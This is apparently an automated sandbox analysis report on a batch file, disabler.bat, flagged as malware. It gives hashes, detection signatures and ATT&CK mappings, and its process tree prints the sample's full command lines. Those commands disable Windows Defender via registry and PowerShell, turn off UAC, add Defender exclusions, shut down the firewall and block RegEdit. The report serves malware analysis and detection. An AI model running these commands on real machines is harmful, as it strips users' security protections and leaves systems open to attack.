Analysis
- max time kernel: 149s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 08/01/2025, 05:12

Static task: static1

Behavioral task: behavioral1
- Sample: disabler.bat
- Resource: win7-20240903-en

Behavioral task: behavioral2
- Sample: disabler.bat
- Resource: win10v2004-20241007-en
General
- Target: disabler.bat
- Size: 2KB
- MD5: c6aff26267067b25326560e96a81513f
- SHA1: e45b8c290c2e9cf625ce255f6d31dda440e3d61e
- SHA256: c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79
- SHA512: d909cfdc454cefb0d26ae72311c27908749c4fa52b4eb2fdf893b30e5d22b024df6e7c8bf2a519877a4995b479e0176730fe5963992057c973a3e9f0569eb441
Malware Config
Signatures
UAC bypass
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (process: powershell.exe)

Command and Scripting Interpreter: PowerShell
- Process: powershell.exe, PIDs 4052, 4844, 4148, 2436, 2944, 2088, 2056, 436

Disables RegEdit via registry modification 1 IoCs
- Set value (int): \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (process: reg.exe)

Modifies Windows Firewall 2 TTPs 1 IoCs
- Process: netsh.exe, PID 3256

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
- Key opened: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (process: netsh.exe)
- Key queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (process: netsh.exe)
- Key value enumerated: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (process: netsh.exe)

Runs net.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs
- Process: powershell.exe, PIDs 2944, 436, 2088, 2056, 4052, 4844, 4148, 2436 (each PID is reported twice)

Suspicious use of AdjustPrivilegeToken 8 IoCs
- Token: SeDebugPrivilege, process: powershell.exe, PIDs 2944, 436, 2088, 2056, 4052, 4844, 4148, 2436

Suspicious use of WriteProcessMemory 36 IoCs
Each write is reported twice; the unique entries (source PID, source process, target PID, procid_target) are:
- PID 2628 cmd.exe wrote to memory of 3080 (procid_target 83)
- PID 3080 net.exe wrote to memory of 488 (procid_target 84)
- PID 2628 cmd.exe wrote to memory of 3968 (procid_target 85)
- PID 2628 cmd.exe wrote to memory of 4044 (procid_target 86)
- PID 2628 cmd.exe wrote to memory of 4820 (procid_target 87)
- PID 2628 cmd.exe wrote to memory of 2892 (procid_target 88)
- PID 2628 cmd.exe wrote to memory of 60 (procid_target 89)
- PID 2628 cmd.exe wrote to memory of 2276 (procid_target 90)
- PID 2628 cmd.exe wrote to memory of 2944 (procid_target 91)
- PID 2628 cmd.exe wrote to memory of 436 (procid_target 92)
- PID 2628 cmd.exe wrote to memory of 2088 (procid_target 93)
- PID 2628 cmd.exe wrote to memory of 2056 (procid_target 94)
- PID 2628 cmd.exe wrote to memory of 4052 (procid_target 95)
- PID 2628 cmd.exe wrote to memory of 4844 (procid_target 96)
- PID 2628 cmd.exe wrote to memory of 4148 (procid_target 97)
- PID 2628 cmd.exe wrote to memory of 2436 (procid_target 98)
- PID 2628 cmd.exe wrote to memory of 3256 (procid_target 99)
- PID 2628 cmd.exe wrote to memory of 2964 (procid_target 100)
Processes
(process tree; indentation shows parent/child depth)

- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"
  PID: 2628
  Signatures: Suspicious use of WriteProcessMemory

  - C:\Windows\system32\net.exe
    Command line: net session
    PID: 3080
    Signatures: Suspicious use of WriteProcessMemory

    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 session
      PID: 488

  - C:\Windows\system32\reg.exe
    Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    PID: 3968

  - C:\Windows\system32\reg.exe
    Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f
    PID: 4044

  - C:\Windows\system32\reg.exe
    Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f
    PID: 4820

  - C:\Windows\system32\reg.exe
    Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f
    PID: 2892

  - C:\Windows\system32\reg.exe
    Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f
    PID: 60

  - C:\Windows\system32\reg.exe
    Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f
    PID: 2276

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"
    PID: 2944
    Signatures: UAC bypass; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"
    PID: 436
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Set-MpPreference -PUAProtection Disabled"
    PID: 2088
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Set-MpPreference -HighThreatDefaultAction 6"
    PID: 2056
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"
    PID: 4052
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Set-MpPreference -LowThreatDefaultAction 6"
    PID: 4844
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"
    PID: 4148
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -Command "Set-MpPreference -ScanScheduleDay 8"
    PID: 2436
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  - C:\Windows\system32\netsh.exe
    Command line: netsh advfirewall set allprofiles state off
    PID: 3256
    Signatures: Modifies Windows Firewall; Event Triggered Execution: Netsh Helper DLL

  - C:\Windows\system32\reg.exe
    Command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
    PID: 2964
    Signatures: Disables RegEdit via registry modification
Network
MITRE ATT&CK Enterprise v15
Persistence
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
Downloads